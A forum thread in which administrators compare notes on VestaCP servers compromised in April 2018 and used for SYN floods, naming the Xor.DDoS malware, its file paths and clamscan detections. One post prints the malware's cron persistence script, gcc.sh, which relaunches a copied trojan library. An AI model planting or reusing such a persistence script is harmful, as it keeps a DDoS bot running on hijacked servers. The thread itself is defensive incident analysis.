Got 10 VestaCP servers exploited

[albertus]

Hello!

Today I was surprised to discover that 10 of our customers servers were being exploited (attacking a chinese IP). All these servers have nothing in common but the fact they all run VestaCP. None of my non-VestaCP servers were affected.

I would like to ask if anyone was also affected. Any chance there's a VestaCP vulnerability being exploited in the wild?

Thank you in advance

Kindly, Albertus

[lukapaunovic]

This happened to my clients.
I have 3 clients from different geographic locations.
all they have in common is that their server got suspended by ovh and that they are using vesta.
They all allegedly did some syn flood to the same IP:

111.231.132.129

Which is crazy.

[dpeca]

Albertus, where are your servers?
OVH ?

[lukapaunovic]

Interestingly the OVH refuses to provide access via rescue to backup files so i can investigate what happened.
for one server they provided read-only FTP access and i can't read/download/open any of the files.
This is really suspicious to me.
It looks like ovh nodes got hacked

[dpeca]

Albertus, can you tell us in what variant you installed Vesta, default (nginx+apache) or nginx+fpm?
What linux distribution you are using?

[StudioMaX]

Me too. I've created another thread (in russian). But my provider is FastVPS, not OVH.

[lukapaunovic]

One of the clients VPS at OVh got unlocked.
first they highly resisted even giving rescue access to the files and then they simply unlocked and it didn't say what's the deal.
I am going just to block that IP in firewall. as i found no evidence in logs after server got unlocked it was attacked like they claim

[dmitry-itldc]

The same thing - some VDS's was exploited, all has Vesta installed on Centos 7, as far as I see.

Most of systems was compromised few days ago (4-5 april). Malicious software, used for attacks - a variant of Linux/Xorddos.C (https://en.wikipedia.org/wiki/Xor_DDoS), you can find files like gcc.sh, /tmp/update, /usr/lib/libudev.so.

Clamscan can detect this malware, for example:

# clamscan -r -i /usr
/usr/bin/tcfndpnals: Unix.Trojan.DDoS_XOR-1 FOUND
/usr/lib/libudev.so: Unix.Trojan.DDoS_XOR-1 FOUND

We still investigating how systems was compromised.

[StudioMaX]

Found in /etc/cron.hourly/gcc.sh, modified 04.04.2018 16:25:00

Code: Select all

#!/bin/sh
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin
for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done
cp /lib/libudev.so /lib/libudev.so.6
/lib/libudev.so.6

I did not think that the infection was a few days ago. Analyzed all the logs for today - nothing suspicious, no authorization in Vesta and so on.

[lukapaunovic]

i also see gcc.sh present and unix tool....
:(